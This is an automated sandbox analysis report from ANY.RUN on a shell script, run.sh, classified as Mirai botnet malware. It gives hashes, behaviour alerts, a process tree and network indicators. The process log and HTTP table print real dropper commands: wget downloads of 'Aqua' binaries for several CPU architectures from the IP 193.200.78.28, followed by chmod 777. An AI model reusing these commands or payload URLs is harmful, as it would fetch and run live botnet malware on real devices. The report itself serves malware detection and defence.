download:

/run.sh

Full analysis: https://app.any.run/tasks/861fa8d8-d56d-4b02-86fe-6231af3caa5c
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: April 26, 2025, 21:08:32
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

91E127DAA64471F7914F58EE7704FED6

SHA1:

EC9BB24DF1A04242B63A87DACEB33C9A4AF1C223

SHA256:

A7DC3ECFBDAA04C99047D64A308C2E6EF04894C17C4237E78AE96A96D581278A

SSDEEP:

24:uvDVvRv+NNIRnvJvhvNvbJnvMNorTvpvZv/vvvh:ubVpBhZl9MwTBxXnJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 39529)
      • Aqua.x86_64 (PID: 39552)
  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 39505)
    • Modifies file or directory owner

      • sudo (PID: 39502)
    • Uses wget to download content

      • bash (PID: 39506)
    • Reads /proc/mounts (likely used to find writable filesystems)

      • dbus-daemon (PID: 39589)
      • dbus-daemon (PID: 39631)
      • dbus-daemon (PID: 39653)
      • dbus-daemon (PID: 39745)
      • gnome-shell (PID: 39715)
      • gjs-console (PID: 39800)
      • gjs-console (PID: 39983)
    • Reads passwd file

      • dbus-daemon (PID: 39589)
      • pipewire (PID: 39591)
      • pipewire-media-session (PID: 39592)
      • gdm-session-worker (PID: 39601)
      • dbus-daemon (PID: 39653)
      • pipewire (PID: 39619)
      • pipewire-media-session (PID: 39620)
      • dbus-daemon (PID: 39631)
      • gnome-shell (PID: 39715)
      • dbus-daemon (PID: 39745)
      • ibus-daemon (PID: 39811)
      • gsd-print-notifications (PID: 39827)
      • ibus-daemon (PID: 39949)
      • gvfs-udisks2-volume-monitor (PID: 39752)
      • gsd-media-keys (PID: 39849)
      • gsd-power (PID: 39863)
    • Checks DMI information (probably VM detection)

      • pipewire (PID: 39591)
      • pulseaudio (PID: 39621)
      • pipewire (PID: 39619)
      • gnome-shell (PID: 39715)
    • Potential Corporate Privacy Violation

      • wget (PID: 39508)
      • wget (PID: 39511)
      • wget (PID: 39529)
      • wget (PID: 39537)
      • wget (PID: 39540)
      • wget (PID: 39543)
      • wget (PID: 39514)
      • wget (PID: 39521)
      • wget (PID: 39517)
      • wget (PID: 39525)
      • wget (PID: 39534)
      • wget (PID: 39546)
      • wget (PID: 39549)
    • Connects to unusual port

      • Aqua.x86_64 (PID: 39552)
      • Aqua.x86_64 (PID: 39553)
    • Contacting a server suspected of hosting an CnC

      • Aqua.x86_64 (PID: 39552)
  • INFO

    • Creates file in the temporary folder

      • wget (PID: 39508)
      • wget (PID: 39511)
      • wget (PID: 39514)
      • wget (PID: 39521)
      • wget (PID: 39517)
      • wget (PID: 39525)
      • wget (PID: 39529)
      • wget (PID: 39534)
      • wget (PID: 39537)
      • wget (PID: 39543)
      • wget (PID: 39549)
      • wget (PID: 39546)
      • wget (PID: 39540)
      • gnome-shell (PID: 39715)
    • Checks timezone

      • wget (PID: 39508)
      • wget (PID: 39511)
      • wget (PID: 39514)
      • wget (PID: 39517)
      • wget (PID: 39521)
      • wget (PID: 39525)
      • wget (PID: 39529)
      • wget (PID: 39534)
      • wget (PID: 39537)
      • wget (PID: 39540)
      • wget (PID: 39543)
      • wget (PID: 39546)
      • wget (PID: 39549)
      • dbus-daemon (PID: 39631)
      • gnome-session-binary (PID: 39657)
      • python3.10 (PID: 39692)
      • python3.10 (PID: 39703)
      • gdm-session-worker (PID: 39601)
      • tracker-miner-fs-3 (PID: 39733)
      • gnome-shell (PID: 39715)
      • python3.10 (PID: 39817)
      • gsd-color (PID: 39815)
      • gsd-print-notifications (PID: 39827)
      • spice-vdagent (PID: 39976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
412
Monitored processes
193
Malicious processes
6
Suspicious processes
5

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget systemctl no specs chmod no specs bash no specs wget systemctl no specs chmod no specs bash no specs wget systemctl no specs chmod no specs bash no specs #MIRAI wget systemctl no specs chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs aqua.x86_64 no specs #MIRAI aqua.x86_64 aqua.x86_64 gnome-session-ctl no specs fusermount3 no specs fusermount3 no specs gnome-session-failed no specs gnome-session-ctl no specs fusermount3 no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs dbus-daemon no specs gsd-rfkill no specs pipewire no specs pipewire-media-session no specs pulseaudio no specs dash no specs gnome-session-ctl no specs systemctl no specs dash no specs gdm-session-worker no specs dash no specs dash no specs systemd-user-runtime-dir no specs systemd no specs systemd no specs systemd no specs systemd no specs 30-systemd-environment-d-generator no specs systemd-xdg-autostart-generator no specs systemctl no specs pipewire no specs pipewire-media-session no specs pulseaudio no specs snap-confine no specs tracker-extract-3 no specs gdm-wayland-session no specs dbus-daemon no specs gvfsd no specs dbus-run-session no specs snap-seccomp no specs dbus-daemon no specs gvfsd no specs gnome-session-binary no specs gvfsd-fuse no specs fusermount3 no specs xdg-document-portal no specs gst-plugin-scanner no specs gst-plugin-scanner no specs session-migration no specs dash no specs xdg-permission-store no specs gsettings no specs gsettings no specs fusermount3 no specs python3.10 no specs snap-confine no specs snap-confine no specs snap-update-ns no specs python3.10 no specs dash no specs gsettings no specs gsettings no specs gnome-shell no specs tracker-miner-fs-3 no specs dbus-daemon no specs at-spi-bus-launcher no specs dbus-daemon no specs xwayland no specs gvfs-udisks2-volume-monitor no specs gvfs-mtp-volume-monitor no specs gvfs-gphoto2-volume-monitor no specs gvfs-goa-volume-monitor no specs dbus-daemon no specs goa-daemon no specs dbus-daemon no specs goa-identity-service no specs gvfs-afc-volume-monitor no specs systemd-localed no specs dbus-daemon no specs xdg-permission-store no specs geoclue no specs dbus-daemon no specs dbus-daemon no specs gjs-console no specs at-spi2-registryd no specs gsd-sharing no specs ibus-daemon no specs gsd-wacom no specs gsd-color no specs python3.10 no specs gsd-keyboard no specs gsd-print-notifications no specs gsd-rfkill no specs gsd-smartcard no specs gsd-datetime no specs gsd-media-keys no specs gsd-screensaver-proxy no specs gsd-sound no specs gsd-a11y-settings no specs gsd-housekeeping no specs gsd-power no specs systemd-hostnamed no specs dbus-daemon no specs false no specs ibus-engine-m17n no specs dash no specs xkbcomp no specs gsd-print-notifications no specs gsd-printer no specs fprintd no specs ibus-engine-mozc no specs ibus-engine-unikey no specs dbus-daemon no specs gvfsd no specs ibus-dconf no specs dbus-daemon no specs ibus-portal no specs ibus-daemon no specs dash no specs xkbcomp no specs ibus-dconf no specs ibus-daemon no specs ibus-x11 no specs dbus-daemon no specs ibus-portal no specs spice-vdagent no specs xbrlapi no specs dbus-daemon no specs gjs-console no specs ibus-engine-simple no specs tracker-extract-3 no specs gvfsd-metadata no specs

Process information

PID
CMD
Path
Indicators
Parent process
39501/bin/sh -c "sudo chown user /home/user/Desktop/run\.sh && chmod +x /home/user/Desktop/run\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/run\.sh "/usr/bin/dashany-guest-agent
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39502sudo chown user /home/user/Desktop/run.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39503chown user /home/user/Desktop/run.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39504chmod +x /home/user/Desktop/run.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39505sudo -iu user /home/user/Desktop/run.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39506-bash --login -c \/home\/user\/Desktop\/run\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
39507/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
39508wget http://193.200.78.28/Aqua.arm4/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
39509chmod 777 Aqua.arm4 snap-private-tmp systemd-private-ea9b991fe646425c8c788ace317f0da5-colord.service-Ni0Qqs systemd-private-ea9b991fe646425c8c788ace317f0da5-ModemManager.service-qL6jR8 systemd-private-ea9b991fe646425c8c788ace317f0da5-power-profiles-daemon.service-O28Svt systemd-private-ea9b991fe646425c8c788ace317f0da5-switcheroo-control.service-5jmLOh systemd-private-ea9b991fe646425c8c788ace317f0da5-systemd-logind.service-l8X7Ra systemd-private-ea9b991fe646425c8c788ace317f0da5-systemd-oomd.service-YHCA0i systemd-private-ea9b991fe646425c8c788ace317f0da5-systemd-resolved.service-iDb1yE systemd-private-ea9b991fe646425c8c788ace317f0da5-upower.service-fLmIwG tracker-extract-3-files.1000/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
39510-bash --login -c \/home\/user\/Desktop\/run\.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32512
Executable files
0
Suspicious files
13
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
39508wget/tmp/Aqua.arm4binary
MD5:
SHA256:
39511wget/tmp/Aqua.arm5binary
MD5:
SHA256:
39514wget/tmp/Aqua.arm6binary
MD5:
SHA256:
39517wget/tmp/Aqua.arm7binary
MD5:
SHA256:
39521wget/tmp/Aqua.i686binary
MD5:
SHA256:
39525wget/tmp/Aqua.m68kbinary
MD5:
SHA256:
39529wget/tmp/Aqua.mipsbinary
MD5:
SHA256:
39534wget/tmp/Aqua.mpslbinary
MD5:
SHA256:
39537wget/tmp/Aqua.ppcbinary
MD5:
SHA256:
39540wget/tmp/Aqua.sh4binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
52
DNS requests
17
Threats
31

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.18:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
39511
wget
GET
200
193.200.78.28:80
http://193.200.78.28/Aqua.arm5
unknown
unknown
39514
wget
GET
200
193.200.78.28:80
http://193.200.78.28/Aqua.arm6
unknown
unknown
39508
wget
GET
200
193.200.78.28:80
http://193.200.78.28/Aqua.arm4
unknown
unknown
39517
wget
GET
200
193.200.78.28:80
http://193.200.78.28/Aqua.arm7
unknown
unknown
39521
wget
GET
200
193.200.78.28:80
http://193.200.78.28/Aqua.i686
unknown
unknown
39525
wget
GET
200
193.200.78.28:80
http://193.200.78.28/Aqua.m68k
unknown
unknown
39529
wget
GET
200
193.200.78.28:80
http://193.200.78.28/Aqua.mips
unknown
unknown
39534
wget
GET
200
193.200.78.28:80
http://193.200.78.28/Aqua.mpsl
unknown
unknown
39537
wget
GET
200
193.200.78.28:80
http://193.200.78.28/Aqua.ppc
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.18:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
207.211.211.26:443
odrs.gnome.org
US
whitelisted
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
39508
wget
193.200.78.28:80
raw.intenseproxy.zip
CH
unknown
39511
wget
193.200.78.28:80
raw.intenseproxy.zip
CH
unknown
39514
wget
193.200.78.28:80
raw.intenseproxy.zip
CH
unknown
39517
wget
193.200.78.28:80
raw.intenseproxy.zip
CH
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.206.46
  • 2a00:1450:4001:830::200e
whitelisted
connectivity-check.ubuntu.com
  • 185.125.190.18
  • 185.125.190.17
  • 91.189.91.98
  • 91.189.91.49
  • 91.189.91.96
  • 91.189.91.97
  • 91.189.91.48
  • 185.125.190.98
  • 185.125.190.97
  • 185.125.190.48
  • 185.125.190.49
  • 185.125.190.96
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::98
  • 2620:2d:4002:1::196
  • 2001:67c:1562::23
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::96
  • 2001:67c:1562::24
  • 2620:2d:4002:1::197
whitelisted
odrs.gnome.org
  • 207.211.211.26
  • 195.181.170.19
  • 37.19.194.80
  • 169.150.255.184
  • 169.150.255.180
  • 195.181.175.40
  • 212.102.56.179
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::11
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.58
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
whitelisted
raw.intenseproxy.zip
  • 193.200.78.28
unknown
13.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
39508
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
39508
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39511
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
39511
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39514
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
39514
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39517
wget
Potentially Bad Traffic
ET INFO ARM7 File Download Request from IP Address
39517
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
39517
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39521
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .i686 File
No debug info